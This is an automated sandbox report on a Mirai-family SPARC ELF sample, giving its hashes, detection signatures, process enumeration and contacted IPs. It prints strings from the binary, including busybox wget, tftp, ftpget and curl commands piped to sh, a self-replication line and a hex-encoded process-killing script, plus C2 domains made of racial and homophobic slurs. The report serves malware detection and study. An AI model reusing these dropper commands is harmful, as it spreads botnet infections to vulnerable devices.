Linux Analysis Report
GcOeQTPzrh.elf

Overview

General Information

Sample name: GcOeQTPzrh.elf
renamed because original name is a hash value
Original sample name: 553097f42a705959d8ac6fa18ef66402.elf
Analysis ID: 1432450
MD5: 553097f42a705959d8ac6fa18ef66402
SHA1: 5b080cba5797148f29a2db09ee3c6966fe295c5f
SHA256: 853b73f9ecd2f7e8a75e9a45292ad6978b420e9bb5ee9b09010bfe88c514115e
Tags: 32elfmiraisparc
Infos:

Detection

Score: 52
Range: 0 - 100
Whitelisted: false

Signatures

Multi AV Scanner detection for submitted file
Sends malformed DNS queries
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: GcOeQTPzrh.elf ReversingLabs: Detection: 55%
Source: GcOeQTPzrh.elf Virustotal: Detection: 33% Perma Link
Found strings indicative of a multi-platform dropper
Source: GcOeQTPzrh.elf String: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0

Networking
barindex
Sends malformed DNS queries
Source: global traffic DNS traffic detected: malformed DNS query: infectedslurs.geek. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: yellowchink.pirate. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: w3d0ntlikebot5.parody. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: hiakamai.dyn. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: freethewind.parody. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: chinklabs.dyn. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: netfags.geek. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: dogeatingchink.parody. [malformed]
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.23:37208 -> 204.76.203.223:38241
Sample listens on a socket
Source: /tmp/GcOeQTPzrh.elf (PID: 6238) Socket: 127.0.0.1::39148 Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 168.195.22.93
Source: unknown TCP traffic detected without corresponding DNS query: 3.79.81.223
Source: unknown TCP traffic detected without corresponding DNS query: 174.200.151.232
Source: unknown TCP traffic detected without corresponding DNS query: 156.53.26.87
Source: unknown TCP traffic detected without corresponding DNS query: 109.240.159.92
Source: unknown TCP traffic detected without corresponding DNS query: 52.215.196.204
Source: unknown TCP traffic detected without corresponding DNS query: 198.40.19.67
Source: unknown TCP traffic detected without corresponding DNS query: 131.178.208.104
Source: unknown TCP traffic detected without corresponding DNS query: 221.118.126.217
Source: unknown TCP traffic detected without corresponding DNS query: 119.149.120.184
Source: unknown TCP traffic detected without corresponding DNS query: 194.208.202.50
Source: unknown TCP traffic detected without corresponding DNS query: 32.103.19.249
Source: unknown TCP traffic detected without corresponding DNS query: 220.21.19.159
Source: unknown TCP traffic detected without corresponding DNS query: 175.30.186.233
Source: unknown TCP traffic detected without corresponding DNS query: 157.87.225.124
Source: unknown TCP traffic detected without corresponding DNS query: 206.158.222.25
Source: unknown TCP traffic detected without corresponding DNS query: 99.218.254.201
Source: unknown TCP traffic detected without corresponding DNS query: 80.203.77.13
Source: unknown TCP traffic detected without corresponding DNS query: 130.246.82.156
Source: unknown TCP traffic detected without corresponding DNS query: 133.52.80.254
Source: unknown TCP traffic detected without corresponding DNS query: 113.60.230.122
Source: unknown TCP traffic detected without corresponding DNS query: 102.155.192.243
Source: unknown TCP traffic detected without corresponding DNS query: 115.103.192.161
Source: unknown TCP traffic detected without corresponding DNS query: 221.17.36.168
Source: unknown TCP traffic detected without corresponding DNS query: 93.54.154.195
Source: unknown TCP traffic detected without corresponding DNS query: 120.73.74.199
Source: unknown TCP traffic detected without corresponding DNS query: 155.87.158.100
Source: unknown TCP traffic detected without corresponding DNS query: 50.115.30.183
Source: unknown TCP traffic detected without corresponding DNS query: 220.135.143.225
Source: unknown TCP traffic detected without corresponding DNS query: 7.138.249.127
Source: unknown TCP traffic detected without corresponding DNS query: 180.166.251.117
Source: unknown TCP traffic detected without corresponding DNS query: 7.121.78.50
Source: unknown TCP traffic detected without corresponding DNS query: 76.51.24.100
Source: unknown TCP traffic detected without corresponding DNS query: 219.50.49.67
Source: unknown TCP traffic detected without corresponding DNS query: 188.213.49.29
Source: unknown TCP traffic detected without corresponding DNS query: 180.195.87.183
Source: unknown TCP traffic detected without corresponding DNS query: 172.93.49.115
Source: unknown TCP traffic detected without corresponding DNS query: 180.194.157.155
Source: unknown TCP traffic detected without corresponding DNS query: 9.119.194.53
Source: unknown TCP traffic detected without corresponding DNS query: 216.49.184.61
Source: unknown TCP traffic detected without corresponding DNS query: 58.52.66.110
Source: unknown TCP traffic detected without corresponding DNS query: 201.58.201.203
Source: unknown TCP traffic detected without corresponding DNS query: 92.239.230.204
Source: unknown TCP traffic detected without corresponding DNS query: 24.83.131.107
Source: unknown TCP traffic detected without corresponding DNS query: 165.36.26.54
Source: unknown TCP traffic detected without corresponding DNS query: 7.60.11.172
Source: unknown TCP traffic detected without corresponding DNS query: 9.231.105.235
Source: unknown TCP traffic detected without corresponding DNS query: 147.47.34.119
Source: unknown TCP traffic detected without corresponding DNS query: 211.9.187.93
Source: unknown TCP traffic detected without corresponding DNS query: 46.158.247.72
Source: global traffic DNS traffic detected: DNS query: dogeatingchink.parody
Source: global traffic DNS traffic detected: DNS query: infectedslurs.geek. [malformed]
Source: global traffic DNS traffic detected: DNS query: yellowchink.pirate. [malformed]
Source: global traffic DNS traffic detected: DNS query: w3d0ntlikebot5.parody. [malformed]
Source: global traffic DNS traffic detected: DNS query: hiakamai.dyn. [malformed]
Source: global traffic DNS traffic detected: DNS query: freethewind.parody. [malformed]
Source: global traffic DNS traffic detected: DNS query: chinklabs.dyn. [malformed]
Source: global traffic DNS traffic detected: DNS query: netfags.geek. [malformed]
Source: global traffic DNS traffic detected: DNS query: dogeatingchink.parody. [malformed]
Source: global traffic DNS traffic detected: DNS query: infectedchink.pirate
Source: GcOeQTPzrh.elf String found in binary or memory: http:///curl.sh
Source: GcOeQTPzrh.elf String found in binary or memory: http:///wget.sh
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57484
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57484 -> 443
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: usage: busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample String containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sample String containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sample String containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0
Source: Initial sample String containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe People's/tmp//var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal52.troj.linELF@0/334@12/0
Enumerates processes within the "proc" file system
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6311/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6311/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6311/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6311/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6310/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6310/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6310/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6310/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6313/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6313/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6313/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6313/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6312/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6312/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6312/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6312/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6270/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6270/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6270/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6270/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6272/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6272/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6272/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6272/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6271/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6271/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6271/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6271/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6304/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6304/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6248/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6248/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6248/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6248/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6303/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6303/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6306/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6306/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6305/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6305/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6308/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6308/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6308/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6308/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6307/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6307/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6309/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6309/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6309/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6309/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6263/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6263/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6262/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6262/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6265/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6265/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6320/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6320/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6320/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6320/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6264/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6264/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6267/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6267/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6267/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6267/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6266/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6266/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6266/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6269/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6269/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6269/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6269/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6302/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6302/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6268/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6268/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6268/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6268/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6301/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6301/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6261/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6261/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6260/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6260/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6315/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6315/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6315/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6315/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6314/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6314/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6314/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6314/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6317/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6317/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6317/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6317/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6316/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6316/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6316/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6316/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6319/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6319/cmdline Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6319/maps Jump to behavior
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6319/cmdline Jump to behavior
Executes the "rm" command used to delete files or directories
Source: /usr/bin/dash (PID: 6299) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.UQEbML9pKR /tmp/tmp.MxD8c0WHrz /tmp/tmp.gi5gwjlr7Q Jump to behavior
Source: /usr/bin/dash (PID: 6300) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.UQEbML9pKR /tmp/tmp.MxD8c0WHrz /tmp/tmp.gi5gwjlr7Q Jump to behavior
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/GcOeQTPzrh.elf (PID: 6238) Queries kernel information via 'uname': Jump to behavior
Source: GcOeQTPzrh.elf, 6238.1.0000556eea687000.0000556eea70c000.rw-.sdmp, GcOeQTPzrh.elf, 6242.1.0000556eea687000.0000556eea70c000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/sparc
Source: GcOeQTPzrh.elf, 6238.1.0000556eea687000.0000556eea70c000.rw-.sdmp, GcOeQTPzrh.elf, 6242.1.0000556eea687000.0000556eea70c000.rw-.sdmp Binary or memory string: nU!/etc/qemu-binfmt/sparc
Source: GcOeQTPzrh.elf, 6238.1.00007ffc93fb1000.00007ffc93fd2000.rw-.sdmp, GcOeQTPzrh.elf, 6242.1.00007ffc93fb1000.00007ffc93fd2000.rw-.sdmp Binary or memory string: /usr/bin/qemu-sparc
Source: GcOeQTPzrh.elf, 6238.1.00007ffc93fb1000.00007ffc93fd2000.rw-.sdmp, GcOeQTPzrh.elf, 6242.1.00007ffc93fb1000.00007ffc93fd2000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-sparc/tmp/GcOeQTPzrh.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/GcOeQTPzrh.elf

No Screenshots

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
214.55.243.178
 unknown United States
6039 DNIC-ASBLK-05800-06055US false
79.185.39.231
 unknown Poland
5617 TPNETPL false
60.3.98.5
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
35.140.64.59
 unknown United States
33363 BHN-33363US false
223.110.157.121
 unknown China
56046 CMNET-JIANGSU-APChinaMobilecommunicationscorporationCN false
100.210.122.248
 unknown United States
21928 T-MOBILE-AS21928US false
188.180.166.178
 unknown Denmark
3292 TDCTDCASDK false
82.210.46.19
 unknown France
34177 CELESTE-ASCELESTE-InternetservicesproviderFR false
214.193.102.183
 unknown United States
721 DNIC-ASBLK-00721-00726US false
15.94.225.48
 unknown United States
13979 ATT-IPFRUS false
17.196.88.66
 unknown United States
714 APPLE-ENGINEERINGUS false
50.70.46.122
 unknown Canada
6327 SHAWCA false
33.241.131.75
 unknown United States
2686 ATGS-MMD-ASUS false
111.1.138.184
 unknown China
56041 CMNET-ZHEJIANG-APChinaMobilecommunicationscorporationC false
3.3.247.52
 unknown United States
16509 AMAZON-02US false
120.126.52.15
 unknown Taiwan; Republic of China (ROC)
18185 NTCU-AS-TW4FNo114Sec1Chung-ShiaoWRoadTW false
78.180.230.73
 unknown Turkey
9121 TTNETTR false
24.167.176.95
 unknown United States
11426 TWC-11426-CAROLINASUS false
205.24.82.200
 unknown United States
2914 NTT-COMMUNICATIONS-2914US false
210.110.112.160
 unknown Korea Republic of
3786 LGDACOMLGDACOMCorporationKR false
54.136.161.153
 unknown United States
14618 AMAZON-AESUS false
49.58.147.165
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
209.228.35.79
 unknown United States
7029 WINDSTREAMUS false
76.236.96.87
 unknown United States
7018 ATT-INTERNET4US false
129.28.238.232
 unknown China
45090 CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa false
144.130.17.107
 unknown Australia
1221 ASN-TELSTRATelstraCorporationLtdAU false
220.74.83.133
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
73.75.202.9
 unknown United States
7922 COMCAST-7922US false
29.74.87.8
 unknown United States
7922 COMCAST-7922US false
101.253.49.222
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
28.77.143.33
 unknown United States
7922 COMCAST-7922US false
43.85.41.49
 unknown Japan 4249 LILLY-ASUS false
162.116.102.78
 unknown United States
45946 AIRNZ-AS2-NZAirNewZealandLimitedNZ false
1.71.43.56
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
31.144.92.78
 unknown Ukraine
56515 OXYNET-ASPL false
88.89.169.78
 unknown Norway
2119 TELENOR-NEXTELTelenorNorgeASNO false
222.94.24.39
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
106.171.167.16
 unknown Japan 2516 KDDIKDDICORPORATIONJP false
46.102.232.138
 unknown Romania
39758 SIMPLIQ-ASRO false
111.191.173.99
 unknown Japan 37903 EMOBILEYmobileCorporationJP false
39.32.71.154
 unknown Pakistan
45595 PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPK false
18.2.148.90
 unknown United States
10578 GIGAPOP-NEUS false
38.89.76.153
 unknown United States
174 COGENT-174US false
110.237.147.252
 unknown China
9808 CMNET-GDGuangdongMobileCommunicationCoLtdCN false
214.201.113.78
 unknown United States
721 DNIC-ASBLK-00721-00726US false
50.199.195.177
 unknown United States
7922 COMCAST-7922US false
151.231.176.142
 unknown United Kingdom
5607 BSKYB-BROADBAND-ASGB false
106.132.156.113
 unknown Japan 2516 KDDIKDDICORPORATIONJP false
70.46.175.85
 unknown United States
7029 WINDSTREAMUS false
209.56.145.43
 unknown United States
6122 ICN-ASUS false
187.218.27.142
 unknown Mexico
8151 UninetSAdeCVMX false
105.59.199.9
 unknown Kenya
33771 SAFARICOM-LIMITEDKE false
104.150.207.172
 unknown United States
1832 SMUUS false
13.53.138.118
 unknown United States
16509 AMAZON-02US false
32.58.251.67
 unknown United States
7018 ATT-INTERNET4US false
189.218.211.141
 unknown Mexico
11888 TelevisionInternacionalSAdeCVMX false
140.127.28.110
 unknown Taiwan; Republic of China (ROC)
38847 NCHU-AS-TWNationalChungHsingUniversityTW false
206.22.5.90
 unknown United States
7270 NET2PHONEUS false
39.179.52.95
 unknown China
9808 CMNET-GDGuangdongMobileCommunicationCoLtdCN false
81.59.219.37
 unknown Belgium
13127 VERSATELASfortheTrans-EuropeanTele2IPTransportbackbo false
199.207.163.40
 unknown United States
7227 KPMGL-ASUS false
107.100.90.205
 unknown United States
7018 ATT-INTERNET4US false
31.2.10.12
 unknown Poland
21243 PLUSNETPlusGSMtransitcorenetworkPL false
87.134.89.109
 unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false
39.106.194.219
 unknown China
37963 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd false
78.197.225.152
 unknown France
12322 PROXADFR false
169.156.107.23
 unknown United States
6189 EPFL-ASUS false
93.5.186.182
 unknown France
15557 LDCOMNETFR false
121.235.4.75
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
58.208.204.180
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
126.142.188.181
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
158.202.88.61
 unknown Japan 2522 PPP-EXPJapanNetworkInformationCenterJP false
125.252.63.152
 unknown Korea Republic of
17608 ABN-AS-KRABNKR false
222.148.143.109
 unknown Japan 4713 OCNNTTCommunicationsCorporationJP false
7.30.25.218
 unknown United States
3356 LEVEL3US false
15.41.197.240
 unknown United States
13979 ATT-IPFRUS false
201.166.102.38
 unknown Mexico
28554 CablemasTelecomunicacionesSAdeCVMX false
104.26.190.2
 unknown United States
13335 CLOUDFLARENETUS false
65.237.37.198
 unknown United States
701 UUNETUS false
135.243.119.140
 unknown United States
10455 LUCENT-CIOUS false
169.21.73.195
 unknown United States
37611 AfrihostZA false
106.61.187.174
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
216.227.66.236
 unknown United States
32645 PIVOTUS false
68.104.159.158
 unknown United States
22773 ASN-CXA-ALL-CCI-22773-RDCUS false
114.128.202.94
 unknown Thailand
56046 CMNET-JIANGSU-APChinaMobilecommunicationscorporationCN false
17.54.59.90
 unknown United States
714 APPLE-ENGINEERINGUS false
49.87.204.180
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
8.186.115.160
 unknown Singapore
37963 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd false
205.231.177.120
 unknown United States
16804 UNASSIGNED false
92.230.179.195
 unknown Germany
6805 TDDE-ASN1DE false
138.189.240.83
 unknown Switzerland
12511 CH-POSTNETZPostCHAGCH false
84.35.150.16
 unknown Netherlands
21221 INFOPACT-ASTheNetherlandsNL false
172.15.61.172
 unknown United States
7018 ATT-INTERNET4US false
161.143.88.7
 unknown Australia
9650 CITEC-AU-APQLDGovernmentBusinessITAU false
185.154.90.68
 unknown Italy
